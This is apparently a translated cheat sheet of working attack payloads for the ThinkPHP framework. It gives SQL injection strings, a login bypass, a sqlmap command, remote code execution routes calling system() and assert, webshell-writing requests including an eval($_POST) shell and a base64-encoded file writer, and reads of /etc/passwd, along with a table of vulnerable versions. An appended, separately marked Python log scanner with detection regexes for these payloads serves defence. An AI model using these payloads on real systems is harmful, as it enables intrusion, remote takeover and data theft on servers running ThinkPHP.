A summary of common historical ThinkPHP vulnerabilities

/?s=/abc/abc/abc/{${phpinfo()}}
index.php/module/action/param1/${@print(THINK_VERSION)}  command execution
index.php/module/action/param1/$%7B@print(phpinfo())%7D  check version
appscn/index.php/module/action/param1/$%7B@print(phpinfo())%7D  reveal path
index.php/module/action/param1/$%7B@print(THINK_VERSION)%7D  reveal path
index.php/Index/index/name/$%7B@phpinfo%28%29%7D  ThinkPHP 3.0-3.1 code execution


ThinkPHP 3.2.3 (latest release) update injection vulnerability
/index.php/home/user?id[]=bind&id[]=1%27&money[]=1123&user=liao
money[]=1123&user=liao&id[0]=bind&id[1]=0%20and%20(updatexml(1,concat(0x7e,(select%20user()),0x7e),1))

ThinkPHP framework 3.2.x SQL injection vulnerability
/index.php?name[0]=bind&name[1]=0 and updatexml(2,concat(0x7e,user()),0)

ThinkPHP 3.2 framework SQL injection vulnerability
table:http://127.0.0.1/index.php?m=Home&c=Index&a=test&id[table]=user where%201%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--

alias:http://127.0.0.1/index.php?m=Home&c=Index&a=test&id[alias]=where%201%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--

where:http://127.0.0.1/index.php?m=Home&c=Index&a=test&id[where]=1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--

 

ThinkPHP 3.0~3.2 injection vulnerability
URL: http://xx.com/index.php/Admin.php?s=/User/Public/check

payload:act=verify&username[0]=='1')) AND UPDATEXML(6026,CONCAT(0x2e0x7167656371,(SELECT (CASE WHEN (6026=6026) THEN 1 ELSE 0 END)),0x716e726771),8197)-- 1between&username[1]=CN000001&password=xxxxxxxxxxx&image.x=65&image.y=15&_hash_=e23b2ac1ecea61a34252c0c93d28a8b6_b9327556a986738edb45004015776680


Exploitable only when ThinkPHP debug mode is enabled.

A generic SQL injection in ThinkPHP 3.1 and 3.2

c:\sqlmap>sqlmap.py -u http://xxx.com/?user[0]=* --dbms mysql --tech b --tamper "thinkphp.py" --dbs


ThinkPHP 3.1.3 and earlier contain a SQL injection vulnerability; detailed analysis and test method for a SQL injection affecting every version of the ThinkPHP framework
Request URL:
http://localhost/Main?id=boo" or 1="1

http://localhost/Main?id=boo%22%20or%201=%221


ThinkPHP 5.x design flaw leaks the database username and password
After registering and logging in, send a plain GET request to http://xxx.com/home/messages/batchRead?ids[0'\]=1


ThinkPHP 5 SQL injection
http://localhost/thinkphp5/public/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1231

ThinkPHP 3.1 / 3.2 universal password (login bypass)
username[0]=exp&username[1]=aa'or 1=1%23&password=1


/public/index.php?s=captcha
_method=__construct&method=get&filter[]=call_user_func&get[]=phpinfo

_method=__construct&method=get&filter[]=assert&get[]=assert(baSe64_decode ('DQpmaWxlX3B1dF9jb250ZW50cygnMS5waHAnLGJhc2U2NF9kZWNvZGUgKCdQRDl3YUhBZ0lBMEtKR0VnUFNCemRISmZjbVZ3YkdGalpTZ2llSGdpTENJaUxDSnpkSGg0Y2w5eVpYaDRjR3hoZUhoalpTSXBPdzBLSkdJZ1BTQWtZU2dpZUNJc0lpSXNJbkI0Y25obGVHZGZlSEo0Wlhod2VHeDRZWGhqWlNJcE93MEtKR01nUFNBa1gxSkZVVlZGVTFSYkozaDRZeWRkT3cwS0pHSW9KeTh1S2k5bEp5d25JQ2N1SkdNc0p5Y3BPdzBLUHo0PScpKQ=='))

/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
/index.php?s=/index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell1.php&vars[1][]=<?phpinfo();?>i  write shell

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo ()


"system() has been disabled for security reasons": the system function is disabled; use the entry above instead.
An "Undefined array index: __construct" error means the target is exploitable as well.

/index.php?s=captcha&m=1

_method=__construct&filter[]=think\__include_file&get[]=/www/wwwroot/www.xx.com/public/upload/20190325/a97b74cbc42a4cd32206621b77aa850a.jpg&method=get&server[]=

_method=__construct&method=get&filter[]=think\__include_file&server[]=phpinfo&get[]=/home/wwwroot/xxx.com/admin/public/favicon.ico&x=phpinfo();  file inclusion that also works on PHP 7

_method=__construct&filter[]=assert&server[]=phpinfo&get[]=phpinfo
or
_method=__construct&filter[]=call_user_func&server[]=phpinfo&get[]=phpinfo
_method=__construct&method=get&filter[]=assert&get[]=file_put_contents('35.php',base64_decode('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'));


That is, this vulnerability does not affect every version.
The author later compared several officially released 5.0 versions and roughly arrived at the following conclusion:

Version   Exploitable   Condition
5.0.0     No            none
5.0.1     No            none
5.0.2     No            none
5.0.3     No            none
5.0.4     No            none
5.0.5     No            none
5.0.6     No            none
5.0.7     No            none
5.0.8     Yes           debug not required
5.0.9     Yes           debug not required
5.0.10    Yes           debug not required
5.0.11    Yes           debug not required
5.0.12    Yes           debug not required
5.0.13    Yes           debug required
5.0.14    Yes           debug required
5.0.15    Yes           debug required
5.0.16    Yes           debug required
5.0.17    Yes           debug required
5.0.18    Yes           debug required
5.0.19    Yes           debug required
5.0.20    No            none
5.0.21    Yes           debug required
5.0.22    Yes           debug required
5.0.23    Yes           debug required
----------------------------------------------------------------------------------------------------------------------------------------
5.0.24 /public/index.php?s=captcha
_method=__construct&method=get&filter[]=call_user_func&get[]=phpinfo
/admin/common/upload.shtml  unauthenticated upload endpoint; reference: https://www.t00ls.net/thread-60829-1-1.html
----------------------------------------------------------------------------------------------------------------------------------------
5.0.x

/?s=index/think\config/get&name=database.username # read configuration values
/?s=index/\think\Lang/load&file=../../test.jpg # include an arbitrary file
/?s=index/\think\Config/load&file=../../t.php # include an arbitrary .php file
/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

5.1.x

/?s=index/\think\Request/input&filter[]=system&data=pwd
/?s=index/\think\view\driver\Php/display&content=<?php phpinfo();?>
/?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=<?php phpinfo();?>
/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
----------------------------------------------------------------------------------------------------------------------------------------
ThinkPHP 5 series
_method=__construct&method=get&filter[]=call_user_func&get[]=phpinfo
_method=__construct&method=get&filter[]=phpinfo&get[]=-1
_method=__construct&filter[]=system&method=get&get[]=phpinfo
_method=__construct&filter[]=assert&server[]=phpinfo&get[]=phpinfo
_method=_constrcuct&filter[]=assert&method=get&server[REQUEST_METHOD]=phpinfo()
index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
Writing a shell:
index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=axgg.php&vars[1][]=<?php @eval($_POST[1]);?>
think/app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo'%3C?php%20@eval($_POST[1]);?%3E%27%3E.axgg.php
s=file_put_contents('axgg.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
Reading files:
_method=__construct&filter[]=scandir&filter[]=var_dump&method=GET&get[]=/data/app/lottery/public // list directory contents
_method=__construct&filter[]=highlight_file&method=GET&get[]=/etc/passwd
s=include("/etc/passwd")&_method=__construct&filter=assert
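Added example, not part of the original post: a small Python scanner that flags the payload families catalogued above (ThinkPHP 3.x `${@...}` variable execution, `bind`/`exp`/`updatexml` array-parameter injection, the `where`/`table`/`alias` keys, and the ThinkPHP 5.x `_method=__construct`, `filter[]=` and `s=index/\think\...` routes) in request logs. The regexes, the log layout, the optional `body="..."` field and the sample lines are my own constructions built from the payloads on this page. A plain access log carries only the request line, so the `_method=__construct` family is visible only where a WAF or the application itself records POST bodies; the `_method` rule flags any override that is not an HTTP verb, which is broader than the exact strings above.

```python
"""Flag ThinkPHP exploitation attempts in request logs (constructed example)."""
import re
from urllib.parse import unquote_plus

# One regex per payload family seen on the page; names are descriptive only.
SIGNATURES = {
    # ThinkPHP 3.0-3.1 template variable execution: ${@print(...)} / {${phpinfo()}}
    "tp3_var_exec": re.compile(r"\$\{@?\w+\("),
    # ThinkPHP 3.x array parameters carrying bind/exp operators: id[]=bind, username[0]=exp
    "tp3_bind_exp": re.compile(r"\w+\[\d*\]=(?:bind|exp)(?:&|$)", re.I),
    # ThinkPHP 3.2 where/table/alias keys smuggled through an array parameter
    "tp3_where_key": re.compile(r"\w+\[(?:table|alias|where)\]=", re.I),
    # Error-based MySQL injection primitive used by most SQLi payloads above
    "sqli_updatexml": re.compile(r"\bupdatexml\s*\(", re.I),
    # ThinkPHP 5.x: _method override that is not an HTTP verb (e.g. __construct)
    "tp5_method_override": re.compile(
        r"(?:^|[?&])_method=(?!(?:get|post|put|patch|delete|head|options)(?:&|$))", re.I),
    # ThinkPHP 5.x: filter[] pointing at a callable
    "tp5_filter_callable": re.compile(
        r"(?:^|[?&])filter(?:\[\w*\])?=(?:assert|system|exec|passthru|shell_exec|"
        r"call_user_func|phpinfo|scandir|highlight_file|var_dump|think\\__include_file)\b", re.I),
    # ThinkPHP 5.x: route parameter s= addressed straight at a \think\ class method
    "tp5_think_route": re.compile(r"(?:^|[?&])s=/?index/\\?think\\", re.I),
}

# Combined-log request line plus an optional body="..." field (constructed layout,
# standing in for whatever a WAF or application log would append).
LOG_RE = re.compile(
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"(?:.*?\bbody="(?P<body>[^"]*)")?')


def decode(value: str) -> str:
    """Percent-decode twice so a double-encoded payload (%2524 -> %24 -> $) is still seen."""
    return unquote_plus(unquote_plus(value))


def classify(request: str) -> list:
    """Return the signature names matching a URL+query string or a POST body."""
    decoded = decode(request)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]


def scan_log(lines) -> list:
    """Return (line_no, client_ip, signatures) for every line that trips a signature."""
    hits = []
    for line_no, line in enumerate(lines, 1):
        match = LOG_RE.search(line)
        if not match:
            continue
        tags = []
        for part in (match.group("target"), match.group("body")):
            if part:
                tags.extend(t for t in classify(part) if t not in tags)
        if tags:
            hits.append((line_no, line.split(" ", 1)[0], tags))
    return hits


# Constructed sample log: one benign line, four built from the page's payloads, one
# benign POST using a legitimate _method override.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?s=/Index/index HTTP/1.1" 200 512',
    '10.0.0.7 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php/Index/index/name/$%7B@phpinfo%28%29%7D HTTP/1.1" 500 0',
    '10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?name[0]=bind&name[1]=0%20and%20updatexml(2,concat(0x7e,user()),0) HTTP/1.1" 500 0',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1" 200 0',
    '10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "POST /public/index.php?s=captcha HTTP/1.1" 200 0 body="_method=__construct&method=get&filter[]=call_user_func&get[]=phpinfo"',
    '10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "POST /index.php/user/1 HTTP/1.1" 200 0 body="_method=PUT&name=alice"',
]

if __name__ == "__main__":
    for line_no, ip, tags in scan_log(SAMPLE_LOG):
        print(f"line {line_no} from {ip}: {', '.join(tags)}")
```

The decode step matters more than the regexes: the `${@phpinfo()}` and `updatexml` payloads are usually percent-encoded in a log, and an `s=captcha` request line on its own looks harmless, which is why the body field has to be fed through the same classifier.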
